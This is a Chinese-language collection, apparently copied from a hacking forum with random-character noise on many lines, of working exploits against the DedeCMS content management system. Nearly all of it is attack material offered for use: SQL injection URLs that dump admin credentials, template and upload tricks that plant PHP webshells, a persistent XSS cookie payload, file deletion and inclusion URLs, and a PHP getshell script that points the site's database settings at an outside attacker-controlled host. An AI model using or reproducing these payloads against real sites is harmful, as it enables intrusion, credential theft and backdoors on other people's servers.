|
|
d3 B/ e( }9 I. t! z7 G
Dedecms 5.6 rss注入漏洞* w) T7 z1 p: q) X7 Z' V4 J: k
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
2 h% Q) T1 A6 w: e4 w% {+ y2 O& E* G* e' H a; Q! z8 w: }
. u( f( w% `8 M9 n$ r
]8 t! w- I1 a: P( @
1 B4 {, V, [+ [. e9 Z8 G# ]- Z4 v+ }% L# C. X0 G! s. M
5 q+ W8 w; B* j \
C: A3 S6 p) b; b3 j
, @0 a' ~! v9 [& w( xDedeCms v5.6 嵌入恶意代码执行漏洞
) T1 y- }' j# z- W- X) V# ^注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57} h* l( v7 H! R7 |0 e8 s* K1 g
发表后查看或修改即可执行% G% `# m* G2 g0 E* ~" [% S
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}; u7 R) K, {. N* y5 E
生成x.php 密码xiao,直接生成一句话。6 D2 J' u% w0 b _) H' h& I' J
6 x' p# j* R @4 R3 i0 ~
% W1 }1 b( @$ B$ q% L* Y6 D
% s9 C6 E: x" a$ h% ] L0 w$ H) h' O1 F" N' Q& O5 o/ t
* V' R" V2 k/ a9 M% s
. Q$ W! z- {! Y0 t, _" D3 T
$ |$ ]+ F% G Y$ R$ k7 @
. _8 P) @1 L6 M" h3 p* `- lDede 5.6 GBK SQL注入漏洞
; D) i" k, a; u- ]4 ]http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
% g5 A: Q. H3 N) w/ ?, `% h7 lhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
& e$ `. `5 X' {3 A6 y" fhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7. v6 r! K0 ^* s- }+ T1 r% C* h
: H! ?5 ~6 H' ?
+ l0 [! x! W! K3 X
- X$ n% B4 Q7 r( t9 H+ n% Q
/ m& ~! T' r, k" I& n' C1 i, v7 _7 P J+ \: S8 @3 z
3 }2 t; {8 J- V. W' v7 A5 c1 j/ v+ N# f5 N8 P& O. H5 P/ H
2 C* v R( X- G0 z# i
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! g" ^; e& M! Shttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ( E9 v' G/ l! w- D; c9 A
3 H! E7 u$ N4 r. U7 X* O* R* @( M
) p. E% r2 y6 S( M+ N& ~7 g2 K# X+ z- o3 O) N
K5 f) Z/ B5 }9 k& a1 ]2 [. o& t6 b' o5 Z: N
5 }7 a3 H& D$ u& o( P, o5 EDEDECMS 全版本 gotopage变量XSS漏洞2 K: ?% Y6 |: Y( V/ L
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 7 O- }5 {5 B% p8 X
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
, c6 p/ q9 n3 W( |8 b7 @7 Q) y3 i5 t) S. x" C5 F
5 P, }% l5 }: j: \ S! W$ a
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 4 F6 W2 _$ k5 a# C2 b b6 O
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda' ~8 N0 _6 t9 o+ v4 H2 I" o
3 Y% h+ L; C9 y+ S" f; H0 w5 g- H9 m, }; I* \( s, V
http://v57.demo.dedecms.com/dede/login.php- B0 Y# j: X! y" o! ^2 e: o1 q
& [1 ?# Q- e9 u$ Y" ~7 S
9 D F( ~% b. b3 i+ F, N- z1 T- o
color=Red]DeDeCMS(织梦)变量覆盖getshell
0 | t; I/ E, i. ?#!usr/bin/php -w
. u& C' @6 Y& @% j$ A<?php
% ~3 _5 N4 @- S- X/ R6 k" D2 ^, merror_reporting(E_ERROR);& |+ H2 u* Y( _& ^% J- @) k4 A
set_time_limit(0);0 x) m* k( [9 _' `
print_r('
9 E, k) {, V) W# b+ ODEDEcms Variable Coverage4 o, R5 b6 e# X& U* x
Exploit Author: www.heixiaozi.comwww.webvul.com: ~& a: {$ X+ U; p( N: n) F0 T; o
);: g: ]! _" _: \0 u. t9 p( O
echo "\r\n";* Z1 R2 u( O' @% z
if($argv[2]==null){1 A8 a6 A! J# Q! K9 w7 S5 Z8 d
print_r('5 ]8 [! ^+ n3 m5 e- o* i
+---------------------------------------------------------------------------+, j; f2 i! A7 Y" Z& R
Usage: php '.$argv[0].' url aid path4 J7 v5 S" O( O6 h8 f: b
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
/ O3 w/ [$ R* u9 K! h* GExample:
" V* R) T: [2 x2 Nphp '.$argv[0].' www.site.com 1 old
' @3 c9 F% v* n" C1 R5 T+---------------------------------------------------------------------------+
. C: ?6 H2 ^3 H8 `5 i) f+ w');! u% ~ Z `8 V2 r. G0 ^2 Q7 ?
exit; u) ]+ J+ l3 J- O% V: s- |0 F
}
5 x! ?- T9 z( S8 t7 g$ [$url=$argv[1];( r' k& U4 p" j- T0 H% L
$aid=$argv[2];! Y; z" |5 J" `1 p' `- d& b5 i6 f
$path=$argv[3];" d" C% A/ } u, F4 Y
$exp=Getshell($url,$aid,$path);
* v% t4 }, v3 [6 D5 R" B, tif (strpos($exp,"OK")>12){5 N$ }0 ]) v, P' k
echo "' H& N! {. s; @# X
Exploit Success \n";
- R6 _( ^" e: P bif($aid==1)echo "- ~$ O s( T# m0 e/ G
Shell:".$url."/$path/data/cache/fuck.php\n" ;
0 w2 U+ W9 v; i, Q& p0 ?, K) q5 P) v3 {0 q: F# q9 `
* E) p/ s% P* d- _, ^+ ^
if($aid==2)echo "" c& y) ~+ H' f. @& {5 M/ y
Shell:".$url."/$path/fuck.php\n" ;) V, l7 h4 s5 D- a, o4 t
8 I2 z! Y9 M& P9 @0 [6 {# Y0 g- O
$ N0 M, C8 e8 o8 Dif($aid==3)echo "+ h% @! I. x* E: m3 I
Shell:".$url."/$path/plus/fuck.php\n";
) f/ t; |# o7 s% G2 v4 W! d9 v, {$ F$ b/ n
- f; L# t- q; g1 O8 O9 X2 E7 n
}else{8 L. ^; x2 C O0 D }/ F4 M+ I
echo "
) ?" x* Y! L: z9 H+ [1 e# pExploit Failed \n";6 k# N7 U$ I8 u6 T* h
}2 [$ m$ y( n! f, ^* e* d `
function Getshell($url,$aid,$path){* n. w% ^. `' o. L5 d
$id=$aid;* X* g+ r. V# ]7 p/ D# r
$host=$url;
}$ P1 u, l/ A$port="80";
9 b% [7 H. y$ }# l$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";: M% }& o% \! w; V4 _
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
, X* W* F4 ^$ s* c+ B$data .= "Host: ".$host."\r\n"; P' i( K3 x( t! X
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
w5 U; k. \' _; D6 d+ ^+ s( p, {$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
, s: P1 f) }+ _- ^9 m' h7 F) n$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";, ~5 @( A& U2 k& o$ [9 ~/ v2 J
//$data .= "Accept-Encoding: gzip,deflate\r\n";9 W! O, g' O' s* K3 i4 I& ~
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
" u+ z2 N+ ~. f$ N8 p$data .= "Connection: keep-alive\r\n";
1 R- U, j; C5 j; `# b$ g5 G$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
2 A! B4 f" q/ Q3 k% y$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
' _$ A$ }* f4 R( E$data .= $content."\r\n";7 g4 F' m2 W& P! n' d3 E; s
$ock=fsockopen($host,$port);& M8 |) f+ ?) ~# h0 o8 X' k* d
if (!$ock) {* i4 @5 z$ O3 d* z! `9 B" @
echo "
2 O' {: G/ x) Q$ Z* w% nNo response from ".$host."\n";4 }. M9 ^: z( G2 O7 u# E$ z
}/ m5 R7 p* |9 L' v! s @
fwrite($ock,$data);
. i- M6 C5 D, t2 A, L* Cwhile (!feof($ock)) {: Q) X# z, j- U3 ~6 c( a' V
$exp=fgets($ock, 1024);) b8 p! w0 m7 S. O; T
return $exp;
5 y* R3 Z# e* f}) W& P4 Q( E3 |6 N0 ~
}8 C9 g) i: Y) U1 Q. e* V
: `3 u- L7 E" U. I( s" w# e4 | a6 T
/ B: |& R& O) y4 }" M! s' b?>9 R4 G+ O$ |# F/ w s- R8 c2 p; k
- }7 U' }+ L% j- ~/ E
/ d% ~. N" E2 {9 Y& g' W2 L: P6 U& v5 x# U
' g7 W2 Z n$ Z$ x; f
& |- e* O2 n8 r. O! d6 b& n
/ x) R2 m# {# j, b& ?- O! u
; x: f% m8 c. s( x2 `; |/ I$ Q; b+ ~
- L- @3 x4 @: L9 B+ X0 \. v7 f/ K8 b& Z0 P0 d( g4 Q$ {( a4 ^
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)& W l) |4 i! r( j
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
3 a: l+ w& F% ?1 J) `5 d1 n9 e' c6 G) _ U# h4 _
1 N: W% h- |- K4 V* W* O% Q把上面validate=dcug改为当前的验证码,即可直接进入网站后台
' n" `9 W2 i+ ]( M; ~2 w2 E' Q( Q) M- {- l
8 Q; B) X8 o8 U6 A" v: K此漏洞的前提是必须得到后台路径才能实现' Z' u3 Z$ j( L- o# d S+ R% D
" w1 |2 P- w. Z9 h
; u& P- h+ B8 R: A# U0 J! j
! j3 d! D) J, |9 O0 {# s
4 v8 `$ H- w- `0 I6 s5 O; Q6 `* ?* y# x8 h2 @: W+ i
* ?. k9 ^1 X# A O% F- j5 |3 v9 {: x
. K5 H D2 a0 {1 ]8 n$ F
; j: I( s# H/ d! i4 C
/ {! _# J" Q7 c0 ~& B) \
Dedecms织梦 标签远程文件写入漏洞1 }7 \1 r% d# g% U u, n8 [- o
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');( ~. a, }- z! F, s
/ Y4 _( B2 j7 ?5 l8 o. a. Y+ ?; g8 j. k
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 Q% G! m; M5 y# u' l<form action="" method="post" name="QuickSearch" id="QuickSearch">8 _# o- J7 \- r
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 q7 R8 X; t# [: ^0 r2 U8 p1 Y w<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! W7 c6 Y1 O/ R$ g
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" {2 O3 h; l" z c, ?- F0 C<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />: d6 X$ H, F* ?7 y9 p/ v- }1 d+ o2 @& X
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
# F p3 g( l8 T/ C<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 R @( d: q% n# m# ? ]<input type="text" value="true" name="nocache" style="width:400">
6 x7 L: B9 E9 s, r$ H% S<input type="submit" value="提交" name="QuickSearchBtn"><br />0 k5 o1 V# x5 A0 z/ W. t
</form>
9 U) N7 `6 `9 c- G; R) i3 h<script>
' m# f3 U. x6 w# g1 d# L, H0 ~function addaction()8 H# w8 f. @9 R! h$ T; u- `
{7 d, u5 `6 l$ I
document.QuickSearch.action=document.QuickSearch.doaction.value; K2 y2 N7 H: x
}
, b0 Q @ C/ ~; Q' }& L( Y</script>
8 z8 I+ O0 q% G9 S8 ]' W- n; N1 J- L: F5 F
- m1 i `; I. {! p% l3 v' @
! I; O" f) {( V( O7 M: K7 J
: K1 m' Y" A: D# x) x* ?. J `7 a
+ H! g4 }, h4 U! s L! U& B+ D! U$ S g9 k3 a( Y" x% L
( I; k9 V0 Y6 @
8 f" D+ V |) _( H& c% L, S* R' e- G( `; B
" A+ q( C/ F; R9 a9 hDedeCms v5.6 嵌入恶意代码执行漏洞
) C9 R3 I ~7 J0 O7 X" z% S- X* V8 P注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
6 e1 ?( R! H. p t. ra{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}2 D E& b8 W& K# _
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得1 N7 @2 U+ n' c, T, ?
Dedecms <= V5.6 Final模板执行漏洞
3 O4 h6 V8 \) r注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
4 j' I2 b1 S% K7 g, Yuploads/userup/2/12OMX04-15A.jpg8 U) ~' k3 K+ N/ D
; K8 X! k0 F$ c! U1 |: Y; t/ l
6 w" h4 H% V+ r1 c1 H. H) ^" Y模板内容是(如果限制图片格式,加gif89a):
. \, t# J3 \) A( \( K{dede:name runphp='yes'}. P5 h6 O- A5 C& P; z
$fp = @fopen("1.php", 'a');
G+ n) j, e+ ~% v* H! Z0 ~# x: A q@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");& T) g4 X; N2 i* |+ p
@fclose($fp);3 g" Y) H5 S% R! I/ E
{/dede:name}+ n4 z; i# }5 l8 E4 s. |
2 修改刚刚发表的文章,查看源文件,构造一个表单:
R' N+ z1 f* C) ~( g4 r<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
) f% N8 ~: w/ Y<input type="hidden" name="dopost" value="save" />
2 T) e; [9 p T% H5 K, X; v3 k }<input type="hidden" name="aid" value="2" />
2 }$ `/ O& x" {! b) G<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
- k: Q; {4 u9 l2 e* H( o) H+ K% b<input type="hidden" name="channelid" value="1" />4 B2 @& m; ~1 k, q# b0 W. `/ u
<input type="hidden" name="oldlitpic" value="" />
7 Q! X( J9 b" e7 n- k8 [' M<input type="hidden" name="sortrank" value="1275972263" />4 M5 H8 |; A4 x) a
! L' @ ]4 B/ X* d0 g w2 Q# Y# F( K+ _& Y% A
<div id="mainCp">& _* b& b7 v* M( U$ J( o) C1 O6 A
<h3 class="meTitle"><strong>修改文章</strong></h3>) p$ x' z* n/ Q. n, B
$ _5 ?& Y- F% s: `4 l
6 P/ O& ^) K v% \( h5 I3 o<div class="postForm">
2 ]$ L9 r6 k* k( x$ N6 `7 p# ^<label>标题:</label>
: C I5 b1 ^; Z( f; C$ ]<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
2 b) r: M. z2 z) _- P; z2 I% l: o7 i. m; j$ y" k6 j- X
: p8 z* Q- g4 o& j7 @* ~0 f<label>标签TAG:</label>" `. F9 T) C$ C0 P2 ?* T
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)8 T' q, U1 I3 f% e! \8 s
" Q' K* p3 Q E' I1 W
+ o# X% n: h+ e# m: d<label>作者:</label>9 B) n7 n* |+ }0 b2 {5 J9 e
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, Z! I. F" M5 x; \. f
* m% E9 d+ ~8 }( z- m
& W. y8 n( o9 ~. r2 L! \" p<label>隶属栏目:</label>$ A h# @# Y1 P0 Y
<select name='typeid' size='1'>/ L2 h+ C" I4 q2 u- e) R. f
<option value='1' class='option3' selected=''>测试栏目</option>
3 C+ T( z# m; w</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
; i1 u- K5 o8 M& b& s
5 N# y7 t) L1 W8 k, s0 J" Q, l- ~# X6 q$ ~4 ?% G5 y( w
<label>我的分类:</label>7 b7 O1 ]$ H/ v
<select name='mtypesid' size='1'>
$ z+ o0 S- D( Y* j: t5 A<option value='0' selected>请选择分类...</option>$ }0 z$ x. ^' \2 d
<option value='1' class='option3' selected>hahahha</option>1 k& W! i s* `3 i" A
</select>
7 ]2 G5 L4 m6 ~- b: k3 I
! H9 \) e0 ?, `9 ~% |' K2 e" ~* f7 C% H& S) Z
<label>信息摘要:</label>
% r/ r6 U4 N* E; m, z% U6 d% z<textarea name="description" id="description">1111111</textarea>
% l z/ }9 H" W1 C" i }7 S(内容的简要说明)
( j/ e/ o) ?2 B+ _, G6 t: Q. m
1 Z, S2 j+ [! N. S0 n) g1 E2 t9 ?8 P* L# H
<label>缩略图:</label>7 a& I) b, u9 p$ p7 W3 f. [
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
$ _. k, g7 U+ \: @! b0 Q) H$ c
0 s c& ?& U: l/ l
& ^( u8 v+ p1 ~<input type='text' name='templet'
2 n# }. M( b2 u% Qvalue="../ uploads/userup/2/12OMX04-15A.jpg">
* Q/ n5 ]( s8 m3 I0 A% X2 C' G: N<input type='text' name='dede_addonfields'
5 K& I3 z' [5 T, a/ d! Uvalue="templet,htmltext;">(这里构造)
; W6 p @4 B! Q+ G' z</div>. n9 X9 g$ a% p! e$ J! b3 z( R
" O8 w6 L" h9 Q9 n w- ]6 d5 |0 h
$ V$ [3 S( W7 z2 F$ V' m2 ?<!-- 表单操作区域 -->
6 Q5 @/ o! \, M7 k" s<h3 class="meTitle">详细内容</h3>
0 j7 P% x+ Q$ g, i" y+ |
* J% V5 k# u1 n
' E" E' a4 [. L1 s7 N<div class="contentShow postForm">8 B9 D( z2 z# z' W" [
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
6 b2 s* d# r U V w# K* L) G- }9 v$ w6 F0 }, x+ q" s6 G. } F
' R$ P$ e1 g. a3 P<label>验证码:</label>
, I* f) x& w1 W( A<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
5 X. n5 d! g4 Q2 H, c* G( w* s<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />9 J Q- u( s. h! O
6 y& O1 z. W# |. u8 B- ~8 l h5 e) X$ h3 F' M$ F F! [
<button class="button2" type="submit">提交</button>7 i: P0 \ A9 I& T$ A7 V1 P
<button class="button2 ml10" type="reset">重置</button>' r1 O. `: Y3 p. N1 ]
</div>
- K; Y, y% r% R' E1 d7 D
+ I5 Z3 I) Q2 g4 R* z
- }4 }: Q0 C9 B: X$ [</div>
% Z, b( i) U0 V. t- n1 a: i% k% j5 n7 J; A* }3 X6 ^) F1 }
: e' G4 B" Z7 T1 V% C# |# D- F( K</form>
8 D3 U& w) H* A8 J; m X f: c- d" V3 j0 N C) E
* A6 m+ J2 ]2 h3 ~* z! n提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
( g$ I. U% l r0 q& B假设刚刚修改的文章的aid为2,则我们只需要访问:1 F& @. o) q3 \' `! T
http://127.0.0.1/dede/plus/view.php?aid=2
; O6 S4 j+ j/ N0 _: @- x即可以在plus目录下生成webshell:1.php
7 a4 i0 H+ Z+ f7 x! i+ [
1 D5 t6 o2 t" N3 ~5 b
6 F% d# e- r0 \/ Z
( b' z. h& [0 d4 ]+ E% @5 z& j' b9 `% r/ q7 C/ G0 W
* m' m" O, b3 o4 u- t0 E2 E& n7 C
/ s) N$ X! j, X4 q1 V3 o9 T6 N5 J! w9 l. R" j K: P( q6 f
9 U6 i9 C: T7 P, v c5 L
& a$ p9 L* t; ]9 g& `8 ?4 _0 {0 f
& p$ Y# J, @/ x+ v7 w) x! r
' g9 \9 E0 q9 N0 ]- I5 ^
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6). R: {! Q; ] m) |& @$ [- C
Gif89a{dede:field name='toby57' runphp='yes'}
) k4 v4 p! u% x8 a+ f9 B; @phpinfo(); d2 K8 f" g V+ @
{/dede:field}6 V7 j' N- h/ m8 j; G
保存为1.gif
b4 J- H' {+ K7 l* u<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
7 M/ B$ q: H, S" ^3 E3 l% F<input type="hidden" name="aid" value="7" /> & |8 W7 Z6 [, {* F6 j$ a4 p
<input type="hidden" name="mediatype" value="1" /> 6 m9 ~% c6 L, c2 ^* }
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
- Q% Y0 W0 S& W- \/ Y4 C<input type="hidden" name="dopost" value="save" /> & U5 W1 @5 a3 ?1 [' n
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 3 n8 O: y C0 I
<input name="addonfile" type="file" id="addonfile"/> " V: |: n5 }& Z2 D5 s
<button class="button2" type="submit" >更改</button>
1 a6 s6 f6 j/ g* i5 J9 Z5 y</form>
$ A" D) M d6 C' I+ m6 \4 k* B2 b! o7 r' V9 x8 c: d3 @
- ^+ {0 u4 j% U1 F2 p
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif* B4 L7 O2 x; i6 n# {1 v
发表文章,然后构造修改表单如下:
/ G. S, n& K$ j" z- }
; I, Y4 C, a7 Y- d( f) O' P5 e- p2 v4 ^) o* {" n
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
: q/ _2 p! f2 A: t2 U" [3 @! n7 o<input type="hidden" name="dopost" value="save" />
- L, K0 i: D; Q% B/ G$ i<input type="hidden" name="aid" value="2" /> . f: S% S# W: m
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> & o/ d* K" l6 O
<input type="hidden" name="channelid" value="1" />
" e1 R& t( A" X5 k<input type="hidden" name="oldlitpic" value="" /> 1 ], x: E, z) w( V# _
<input type="hidden" name="sortrank" value="1282049150" />
# `& A$ A- b1 h8 K) l9 P9 _8 ~! v<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 9 d7 e" b. s. ]8 P, [3 n+ T6 m: h
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
/ v- {4 p4 C6 \" D! i' F% a. W* d<select name='typeid' size='1'>
2 q2 T4 a# V1 I; j* P* u<option value='1' class='option3' selected=''>Test</option>
$ X8 D# l/ }0 R( n! w$ G) e v# S<select name='mtypesid' size='1'>
; ?" h- ^' o& G) H<option value='0' selected>请选择分类...</option>
: V% }" a' t$ D# z. h<option value='1' class='option3' selected>aa</option></select> ' w) X$ z: }5 E
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 8 M# ]3 l/ i1 M/ e, N) r4 x
<input type='hidden' name='dede_addonfields' value="templet"> 9 t, Y, a+ m1 s \" q+ H' b7 _! y
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
! z7 h8 z% n& ]( m$ u8 s<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> . s* U: V- \0 d H
<button class="button2" type="submit">提交</button>
; w* Q$ O' R/ k( M$ R3 t</form>8 X, s, _' V1 E$ ^7 y
$ e8 [/ @- m/ t- M! _( J
, |9 s( w ]3 f0 k( ?( l
& k# d) U. m# K! r$ R
$ ~ g( r6 R( o, d; H, i% F/ f% H9 t/ s! y; o+ H
5 s) c: S/ }4 |7 f, w
5 Z$ i, m) |5 s. d# Z- ^& Y
4 j0 h& B0 x9 p r3 ]. a/ ^) _: C
! M/ H5 m) M3 V9 m, i9 v/ G" r
5 V5 R& V, \+ e p6 W; T# E; h) K6 W5 K8 |2 L4 t' f/ J
) d/ C& e. i& ]8 l! ?
织梦(Dedecms)V5.6 远程文件删除漏洞
8 } [# l: P1 H) Yhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif. m, i. z F7 l! c! D# Y
9 A i6 f# J. M& G# q- Z* U/ N; q7 P' W m' Q
7 ?5 \/ `8 |% g/ G/ Z6 m+ r1 M$ ?
2 ? y- t+ b! f z! X2 X
7 @" | P% n% R
. a0 w4 m% B+ N3 w* `6 B& o1 ?6 r, G9 G' o- ~ w
+ A, Q9 E2 Q0 ^3 O6 F8 W
' f2 s3 M6 y( ]1 s" a" Z o) } P0 z2 J y, {% s9 j
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
; a; c( U3 X. T8 ]( D1 f; khttp://www.test.com/plus/carbuya ... urn&code=../../
9 n: {* E. D& _) f- y. j
' V/ z% ~9 _) d) s6 @1 d$ |3 a. {
- B; G8 A' C/ g& x1 q* m- t
0 T/ J4 y9 p, [5 v
0 A/ }3 {7 u7 s) n* `: L, U
6 }* |+ [, [- i! _5 {$ c6 w% U) H8 K+ y0 s7 P% z
! Z& I( N: i* v" M; F( D6 i0 [
u3 ~$ P7 c- q1 f) Z, r# _: A. K" T7 v
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ! L6 D: t6 }' C2 ~0 X6 L d
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`: K! n9 p2 L& t h* U
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
9 v9 @0 v3 u9 P6 f* H8 N# M4 G
# T0 O& g9 K7 c
* \% C7 S4 b7 m. Q/ M3 K( P1 o& h @. W
& _( k/ |* b' b. v$ g. p
3 k: a4 @! x- S7 E8 g
; T# [4 j2 d8 ~2 \* [- e
6 i, k! R# _+ n" Y2 y; E
6 u' s" a& W0 N, t
! y' x; I% Z- O+ m4 p% C/ U# u; \, _4 B# i8 _6 [6 H! Y0 o
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞" g, q; _5 R) ^
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
1 v* c: A2 [: F2 F
: S, P( g. r1 P1 _" ^( s" u8 i
9 Z2 D, }/ w: |6 n5 \1 K4 f$ i: r% J4 v) Q1 P) `0 @! j
2 d# t4 k- s5 l" `3 w. C# f+ Z/ ?% I3 g5 V" C5 I2 Z$ ^% s
9 @$ K: A3 P/ d7 G) J* T' E3 V, s5 Q
